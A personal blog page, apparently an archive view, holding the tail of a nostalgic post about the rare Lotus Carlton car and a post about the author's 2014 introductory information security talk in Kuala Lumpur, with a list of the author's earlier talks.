Sadly my uncle didn’t buy the car, so I didn’t get to sit in it (or any other) ever again. There were only 320 Lotus Carltons released in the UK, so it is a rare car. Even now, 20+ years later they are fetching good money for mint condition examples (£12-20,000).

There is a modern day equivalent or a spiritual successor (in some ways), the Vauxhall VXR8.

But yah, something I still remember so vividly from my younger years. Some videos for reference..

Fifth Gear Vauxhall VXR8 vs Lotus Carlton

Top Gear Lotus Carlton

Autocar heroes: Lotus Carlton video review


An Introduction To Information Security – OpenCoffeeClubKL #31

So I gave a talk about infosec stuff in July at OpenCoffeeClub KL, as it’s what I used to do for a living – people were always asking me to share a little more about it.

The timing is a little odd again, as it happens. In 2011 I did 2 talks in the same month, 1 on WordPress (High Performance WordPress – Scaling, Tuning, Optimizing & More) & one which was more random (The History Of The Future at WebCamp KL).

In 2012 I ended up doing 2 presentations in the same week (actually on 2 consecutive days), and once again the first was technical and the second a bit more random.

The first one was about MongoDB and was for the KL Mongo User Group AKA KL MUG: High Availability MongoDB & Replica Sets – A How To & Kinda Tutorial.

The second was to a bunch of copywriters about blogging – Blogging WTF? At The Last Word KL – A Meeting For Copywriters.

I guess I skipped 2013, and here I am in 2014 – giving 2 talks almost in the same month again, the first being this one actually and the second was Building Scalable Web Apps – LVL.UP KL – July 2014.

My talk was about 15 minutes and titled “Introduction to Information Security” – which covers some basics on what Information Security is, how it can impact your business and some tips on how to mitigate against risk.

An Introduction To Information Security

Here are the slides:

And the video (the front got cut off slightly – but nothing important, only when I was talking about myself):

So yah, an introduction to infosec – if you do have any further questions drop them in the comments below!

You can see all my talks given here.
